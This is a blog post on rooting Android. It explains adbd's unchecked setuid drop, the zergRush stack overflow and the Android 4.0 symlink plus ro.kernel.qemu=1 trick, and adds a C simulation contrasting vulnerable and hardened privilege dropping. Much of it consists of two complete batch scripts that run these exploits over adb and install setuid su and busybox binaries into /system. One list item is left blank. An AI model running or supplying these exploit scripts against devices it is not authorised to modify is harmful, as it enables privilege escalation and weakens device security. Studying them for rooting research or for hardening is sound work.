Thoughts on Android root

1 Whatever you want to do on Android, you run into permission restrictions, so you frequently need to obtain root privileges.

2 The ways of obtaining root on Android are not all the same. This is dictated by vulnerabilities in the Android source: obtaining root means exploiting a vulnerability in the Android system, and because different versions carry different vulnerabilities, the method of obtaining root differs from version to version.

3 The final step of rooting Android is always the same: place a setuid-root su binary in /system/bin or /system/xbin, place a busybox binary in /system/xbin, and install Superuser.apk to manage which apps are allowed to use root.

4 The vulnerabilities, by Android version, are as follows:

  1 adbd has a bug in how it drops privileges: at startup it calls setuid() to switch from root to the shell uid, but it never checks whether that call succeeded. The attack uses the process-count limit of the shell user: keep fork()ing zombie processes from the adb shell until the limit is reached. Once the shell uid is at its limit, adbd's switch to that uid fails, the failed privilege drop is effectively skipped, and adbd keeps running as root.

  2 zergRush exploit: a stack overflow. It requires the zergRush executable, which is pushed to the device and run from /data/local/tmp.

  3

  4 Android 4.0 root: re-linking. /data/local/tmp is owned by the shell user, so the adb shell can move it aside and replace it with a symlink to /data. At the next boot init re-applies the shell ownership of /data/local/tmp, and because chown follows the symlink, /data itself becomes writable by the shell. The shell can then write /data/local.prop containing ro.kernel.qemu=1; with that property set, adbd believes it is running in the emulator, skips its privilege drop, and comes up as root.

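As an added example (not code from the original post, and not AOSP's adbd source), here is the logic behind vulnerability 1 and the Android 4.0 ro.kernel.qemu trick written out in C against a simulated kernel: setuid() to the shell uid fails with EAGAIN once that uid sits at its process limit, the vulnerable adbd ignores the failure and keeps root, the hardened version refuses to continue, and with ro.kernel.qemu=1 the drop is skipped by policy. AID_SHELL, the struct names, the simulated setuid and the property-policy function are assumptions of this example, modelled on adbd's behaviour as described above; only drop_privileges_real() touches the real kernel.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define AID_ROOT  0
#define AID_SHELL 2000   /* Android's shell uid (assumed constant for this example) */

/* --- simulated device state, constructed for this example ---------------- */
struct sim_props {
    const char *ro_kernel_qemu;   /* "1" once /data/local.prop sets it */
    const char *ro_secure;        /* "1" on production builds */
    const char *ro_debuggable;
    const char *service_adb_root; /* set to "1" by "adb root" on debuggable builds */
};

struct sim_kernel {
    uid_t uid;          /* uid adbd currently runs as */
    int   nproc_used;   /* processes already owned by AID_SHELL */
    int   nproc_limit;  /* RLIMIT_NPROC for AID_SHELL */
};

/* Simulated setuid(): like the real one, switching to an unprivileged uid
   fails with EAGAIN once that uid has reached its RLIMIT_NPROC. */
static int sim_setuid(struct sim_kernel *k, uid_t target)
{
    if (target != AID_ROOT && k->nproc_used >= k->nproc_limit) {
        errno = EAGAIN;
        return -1;
    }
    k->uid = target;
    return 0;
}

/* Attacker side of vulnerability 1: fork shell processes until the shell
   uid's limit is full (the real exploit loops until fork() fails). */
static int exhaust_nproc(struct sim_kernel *k)
{
    int forked = 0;
    while (k->nproc_used < k->nproc_limit) {
        k->nproc_used++;
        forked++;
    }
    return forked;
}

/* Policy modelled on adbd's startup: stay root in the emulator
   (ro.kernel.qemu=1); otherwise drop unless ro.secure is off, or the build
   is debuggable and "adb root" set service.adb.root. Returns 1 = drop. */
static int should_drop_privileges(const struct sim_props *p)
{
    if (strcmp(p->ro_kernel_qemu, "1") == 0)
        return 0;
    if (strcmp(p->ro_secure, "1") != 0)
        return 0;
    if (strcmp(p->ro_debuggable, "1") == 0 &&
        strcmp(p->service_adb_root, "1") == 0)
        return 0;
    return 1;
}

/* Vulnerable startup: calls setuid() and ignores the result.
   Returns the uid adbd actually ends up running as. */
static uid_t adbd_start_unchecked(struct sim_kernel *k, const struct sim_props *p)
{
    k->uid = AID_ROOT;                 /* init starts adbd as root */
    if (should_drop_privileges(p))
        sim_setuid(k, AID_SHELL);      /* BUG: return value discarded */
    return k->uid;
}

/* Hardened startup: returns -1 (adbd must exit) if the drop did not happen. */
static int adbd_start_checked(struct sim_kernel *k, const struct sim_props *p)
{
    k->uid = AID_ROOT;
    if (should_drop_privileges(p)) {
        if (sim_setuid(k, AID_SHELL) != 0 || k->uid != AID_SHELL)
            return -1;
    }
    return 0;
}

/* The same check against the real kernel, for daemons of your own:
   check the return value AND verify the uids actually changed. */
int drop_privileges_real(uid_t target)
{
    if (setuid(target) != 0)
        return -1;
    if (getuid() != target || geteuid() != target)
        return -1;
    return 0;
}

int main(void)
{
    struct sim_props prod = { "0", "1", "0", "0" };  /* ordinary production build */
    struct sim_kernel k = { AID_ROOT, 0, 4 };

    printf("normal boot: adbd uid = %u\n", (unsigned)adbd_start_unchecked(&k, &prod));
    exhaust_nproc(&k);
    printf("after fork storm: unchecked adbd uid = %u\n", (unsigned)adbd_start_unchecked(&k, &prod));
    printf("after fork storm: checked adbd returns %d\n", adbd_start_checked(&k, &prod));

    struct sim_props qemu = { "1", "1", "0", "0" };  /* /data/local.prop: ro.kernel.qemu=1 */
    struct sim_kernel k2 = { AID_ROOT, 0, 4 };
    printf("ro.kernel.qemu=1: adbd uid = %u (drop skipped by policy)\n",
           (unsigned)adbd_start_unchecked(&k2, &qemu));
    return 0;
}
```

The fork storm only changes one thing, the return value of setuid(), which is why the unchecked daemon and the checked one diverge; the ro.kernel.qemu path needs no bug at all, only a property file the shell was never supposed to be able to write.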
5 The commands for obtaining root are as follows:

 zergRush vulnerability (Windows batch script; adb, zergRush, busybox, su and Superuser.apk are expected in a files\ folder next to it):

@echo ---------------------------------------------------------------
@echo               Easy rooting toolkit (v1.0)
@echo                    created by DooMLoRD
@echo         using exploit zergRush (Revolutionary Team)
@echo    Credits go to all those involved in making this possible!
@echo ---------------------------------------------------------------
@echo  [*] This script will:
@echo      (1) root ur device using zergRush exploit
@echo      (2) install Busybox (1.18.4)
@echo      (3) install SU files (3.0.5)
@echo  [*] Before u begin:  
@echo      (1) make sure u have installed adb drivers for ur device
@echo      (2) enable "USB DEBUGGING"
@echo            from (Menu\Settings\Applications\Development)
@echo      (3) enable "UNKNOWN SOURCES"
@echo            from (Menu\Settings\Applications)
@echo      (4) [OPTIONAL] increase screen timeout to 10 minutes
@echo      (5) connect USB cable to PHONE and then connect to PC
@echo      (6) skip "PC Companion Software" prompt on device
@echo ---------------------------------------------------------------
@echo  CONFIRM ALL THE ABOVE THEN
@pause
@echo --- STARTING ----
@echo --- WAITING FOR DEVICE
@files\adb wait-for-device
:: stage the exploit in /data/local/tmp, the one directory the uid-shell adb shell can write
@echo --- cleaning
@files\adb shell "cd /data/local/tmp/; rm *"
@echo --- pushing zergRush
@files\adb push files\zergRush /data/local/tmp/.
@echo --- correcting permissions
@files\adb shell "chmod 777 /data/local/tmp/zergRush"
:: the exploit restarts adbd with root, so the device drops off adb for a moment
@echo --- executing zergRush
@files\adb shell "/data/local/tmp/zergRush"
@echo --- WAITING FOR DEVICE TO RECONNECT
@echo if it gets stuck over here for a long time then try:
@echo    disconnect usb cable and reconnect it
@echo    toggle "USB DEBUGGING" (first disable it then enable it)
@echo --- DEVICE FOUND
@files\adb wait-for-device
@echo --- pushing busybox
@files\adb push files\busybox /data/local/tmp/.
@echo --- correcting permissions
@files\adb shell "chmod 755 /data/local/tmp/busybox"
@echo --- remounting /system
:: adbd is root now, so /system can be remounted read-write
@files\adb shell "/data/local/tmp/busybox mount -o remount,rw /system"
@echo --- copying busybox to /system/xbin/
@files\adb shell "dd if=/data/local/tmp/busybox of=/system/xbin/busybox"
@echo --- correcting ownership
@files\adb shell "chown root.shell /system/xbin/busybox"
@echo --- correcting permissions
:: 04755 = setuid root busybox, which is what this toolkit intends
@files\adb shell "chmod 04755 /system/xbin/busybox"
@echo --- installing busybox
:: create the applet symlinks (ls, mount, ...) in /system/xbin
@files\adb shell "/system/xbin/busybox --install -s /system/xbin"
@files\adb shell "rm -r /data/local/tmp/busybox"
@echo --- pushing SU binary
@files\adb push files\su /system/bin/su
@echo --- correcting ownership
@files\adb shell "chown root.shell /system/bin/su"
@echo --- correcting permissions
:: 06755 = setuid+setgid root; from now on this su binary is what grants root
@files\adb shell "chmod 06755 /system/bin/su"
@echo --- correcting symlinks
@files\adb shell "rm /system/xbin/su"
@files\adb shell "ln -s /system/bin/su /system/xbin/su"
@echo --- pushing Superuser app
@files\adb push files\Superuser.apk /system/app/.
@echo --- cleaning
@files\adb shell "cd /data/local/tmp/; rm *"
@echo --- rebooting
@files\adb reboot
@echo ALL DONE!!!
@pause

Under Android 4.0 (Windows batch script; su, busybox, Superuser.apk and RootExplorer.apk are expected next to it, and adb on the PATH):

@echo off

cls
echo.
echo by zopo008 (welcome to bbs.zopomobile.com.)
echo.
echo.
:: step 1: /data/local/tmp belongs to the shell user, so replace it with a symlink to /data;
:: at boot init re-applies the shell ownership of /data/local/tmp and chown follows the symlink onto /data
adb shell mv /data/local/tmp /data/local/tmp.bak
adb shell ln -s /data /data/local/tmp
adb reboot
echo Rebooting (1/3) - Wait until the device finishes rebooting, then press any key to continue
pause

:: step 2: /data is now writable by the shell; ro.kernel.qemu=1 in local.prop makes adbd come up as root
adb shell rm /data/local.prop > nul
adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
adb reboot
echo Rebooting (2/3) - Wait until the device finishes rebooting, then press any key to continue
pause

:: gate: continue only if the adb shell really is uid 0 now
adb shell id
echo If the id is 0 / root, press any key to continue; otherwise press Ctrl+C (answer Y) to cancel this attempt and start over
pause

:: step 3: install su, busybox and the manager apps into /system
adb remount
adb push su /system/bin/su
adb shell chown 0.0 /system/bin/su
adb shell chmod 06755 /system/bin/su
adb push busybox /system/bin/busybox
adb shell chown 0.0 /system/bin/busybox
adb shell chmod 0755 /system/bin/busybox
adb push Superuser.apk /system/app/Superuser.apk
adb shell chown 0.0 /system/app/Superuser.apk
adb shell chmod 0644 /system/app/Superuser.apk
adb push RootExplorer.apk /system/app/RootExplorer.apk
adb shell chown 0.0 /system/app/RootExplorer.apk
adb shell chmod 0644 /system/app/RootExplorer.apk
:: undo the symlink and the property override so that only the su binary remains
echo Removing changes except ROOT (cleaning up and restoring)
adb shell rm /data/local.prop
adb shell rm /data/local/tmp
adb shell mv /data/local/tmp.bak /data/local/tmp
adb reboot

echo Rebooting (3/3) - You should now be rooted
pause

echo on

Original post: https://www.cnblogs.com/jackrex/p/3001405.html